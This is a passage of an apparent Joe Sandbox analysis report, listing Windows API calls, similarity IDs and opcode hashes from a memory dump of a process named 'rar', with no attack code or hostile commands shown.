                                                            • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF71D313CEF,?,?,00000000,00007FF71D313CAA,?,?,00000000,00007FF71D313FD9), ref: 00007FF71D3197A5
                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF71D313CEF,?,?,00000000,00007FF71D313CAA,?,?,00000000,00007FF71D313FD9), ref: 00007FF71D319807
                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF71D313CEF,?,?,00000000,00007FF71D313CAA,?,?,00000000,00007FF71D313FD9), ref: 00007FF71D319841
                                                            • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF71D313CEF,?,?,00000000,00007FF71D313CAA,?,?,00000000,00007FF71D313FD9), ref: 00007FF71D31986B
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                            • String ID:
                                                            • API String ID: 1557788787-0
                                                            APIs
                                                            Similarity
                                                            • API ID: ErrorLast$FileHandleRead
                                                            • String ID:
                                                            • API String ID: 2244327787-0
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: AFUM$default.sfx
                                                            • API String ID: 0-2491287583
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: FileHandleType
                                                            • String ID: @
                                                            • API String ID: 3000768030-2766056989
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Threadwcschr$CreateExceptionPriorityThrow
                                                            • String ID: CreateThread failed
                                                            • API String ID: 1217111108-3849766595
                                                            APIs
                                                            Similarity
                                                            • API ID: CriticalSection$EnterEventLeave
                                                            • String ID:
                                                            • API String ID: 3094578987-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ConsoleFileHandleModeType
                                                            • String ID:
                                                            • API String ID: 4141822043-0
                                                            • Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                            • Instruction ID: 1a9df39a601b171961223706ea15a7a02e6d024eaf90c49da6f9e299deea39ac
                                                            • Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                            • Instruction Fuzzy Hash: 84E0EC24E1DE0282EE686761A865179D252AF59BA1F941038DA1F8A750FE3CD98D8B20
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                            • Instruction ID: 23a12e08778a9b31063482101191170db2fe87e17cf4f28f3b0db48e1f920d01
                                                            • Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                            • Instruction Fuzzy Hash: C6E01A34F0CB26C2EB547B609882779E352AF95761F40543CCC0E02392FE3DA40C8A60
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CharEnvironmentExpandStrings
                                                            • String ID:
                                                            • API String ID: 4052775200-0
                                                            • Opcode ID: d3cf55b71ff3c281346cb4b18b9965101663fbf2bf251821757e6ab4d6f75e53
                                                            • Instruction ID: cdc05dd6ccd5194feae4d129bc8eb2236aca15985201aec31d0a8d31a1655302
                                                            • Opcode Fuzzy Hash: d3cf55b71ff3c281346cb4b18b9965101663fbf2bf251821757e6ab4d6f75e53
                                                            • Instruction Fuzzy Hash: 96E1D723A1CE8285EB60AB64D4201FDE760FB917A4F944131DBAD076D9EF7CD58ACB10
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF71D2C7EBE,00000000,00000000,00000000,00000000,00000007,00007FF71D2C7C48), ref: 00007FF71D2D1B8D
                                                            • CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF71D2C7EBE,00000000,00000000,00000000,00000000,00000007,00007FF71D2C7C48), ref: 00007FF71D2D1BD7
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                            • Instruction ID: dc0346ffafd81fa4719532f864378fd6690a9259c5d1d1d5afcd6a4f74a4a9eb
                                                            • Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                            • Instruction Fuzzy Hash: B5312873A1CE8586F730AF10E4153A9A6A0EB50B78F904334D9BC06AC5FF7CC4898B60
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                            • String ID:
                                                            • API String ID: 932687459-0
                                                            • Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                            • Instruction ID: ae8ce0ac1e0e10a1f85aa80333a326fa99f516a6a4626347ca0446deafd563ab
                                                            • Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                            • Instruction Fuzzy Hash: 7321C46390CF8582EB119F29D1410B8A360FB9CB98B58A321DF5D03616EF28E1E9C700
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 16b2a8006f7396a77cc468de0c3eb669dd52c88d84059797fb67b2da720282ec
                                                            • Instruction ID: 781d33b07046c623d6af709c54cebed70190585261899052d24a27cdd5f9dbfc
                                                            • Opcode Fuzzy Hash: 16b2a8006f7396a77cc468de0c3eb669dd52c88d84059797fb67b2da720282ec
                                                            • Instruction Fuzzy Hash: 5D11D33260DF8281EA10FB54A5003A9F2A4EF897A0F944239D6AD477E6EE7CD415CB20
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                            • Instruction ID: 71499ecba9a28754750e4fb3bd2bf7281b7a224bcf8736d1f4e3db4dcd29ff9d
                                                            • Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                            • Instruction Fuzzy Hash: F8010A32E1CE5181EA645B25A550128E251AF95BB0FA49230DA7D03BD5EF3CD4498F10
                                                            APIs
                                                            • setbuf.LIBCMT ref: 00007FF71D2C7A7B
                                                              • Part of subcall function 00007FF71D312AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF71D317EF3
                                                            • setbuf.LIBCMT ref: 00007FF71D2C7A8F
                                                              • Part of subcall function 00007FF71D2C7B44: GetStdHandle.KERNEL32(?,?,?,00007FF71D2C7A9E), ref: 00007FF71D2C7B4A
                                                              • Part of subcall function 00007FF71D2C7B44: GetFileType.KERNELBASE(?,?,?,00007FF71D2C7A9E), ref: 00007FF71D2C7B56
                                                              • Part of subcall function 00007FF71D2C7B44: GetConsoleMode.KERNEL32(?,?,?,00007FF71D2C7A9E), ref: 00007FF71D2C7B69
                                                              • Part of subcall function 00007FF71D312ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF71D312AD0
                                                              • Part of subcall function 00007FF71D312B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF71D312C1C
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
                                                            • String ID:
                                                            • API String ID: 4044681568-0
                                                            • Opcode ID: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
                                                            • Instruction ID: 137877a5795529a2fd1fccc32ebfbe5efc537751224e6e7bba554758f0780a42
                                                            • Opcode Fuzzy Hash: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
                                                            • Instruction Fuzzy Hash: 8301D764E2D9839AFA58B37558A27B9D4428F91330FC0817CE52E0B2D3FD5C680E8B71
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                            • Instruction ID: 28ca80d1b1498a0f7e65d92a11dd077a11c7893a6b6f63416dadb7c5d6dcc00c
                                                            • Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                            • Instruction Fuzzy Hash: 4201A132A1CE4281EB64AB29E484279E360EF41B78F944335D63D021E5EF3CD58ECB20
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(00000800,00007FF71D2D305D,?,?,?,?,?,?,?,?,00007FF71D2E4126,?,?,?,?,00000800), ref: 00007FF71D2D30F0
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF71D2E4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF71D2D3119
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                            • Instruction ID: 595b6adc11eab3627ef7e0286a7f4a58dafa00f051e56174a2552f4e0ccb20bf
                                                            • Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                            • Instruction Fuzzy Hash: C8F0A431B1CEC181EA60AB24F4553A9E350BB4D7E4F800134E9DC83799EE6CD58D8E10
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                             • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystem
                                                            • String ID:
                                                            • API String ID: 1175261203-0
                                                            • Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                            • Instruction ID: e192755a12dcab6d8b7c8429ab1bd1fddcb2526c7bd8845b32e7406519c42616
                                                            • Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                            • Instruction Fuzzy Hash: 16F0FF35B1C98186F660AB20E8153E6E264BB9C794FC04535E9DD82699FE2CD649CE20
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                             • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Process$AffinityCurrentMask
                                                            • String ID:
                                                            • API String ID: 1231390398-0
                                                            • Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                            • Instruction ID: 33e7a2d93e5e88d0337ecf8cf5ef428326f3422630c7a06b1031c47f93d547fc
                                                            • Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                            • Instruction Fuzzy Hash: 4DE06561B3895186DBD867199496FA99391AB54B80FC06039E41A83A54FD1DD54C8F10
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                             • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                            • String ID:
                                                            • API String ID: 588628887-0
                                                            • Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                            • Instruction ID: 89772c389bb72925261eb32b614fbe3a1521528a8d79493da69b754f07a476f9
                                                            • Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                            • Instruction Fuzzy Hash: 37E046B1E1D943C2FE59BBB2A804174D3916F48B60F98843CD90D46252FE2CA44D8A64
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                             • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                             • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
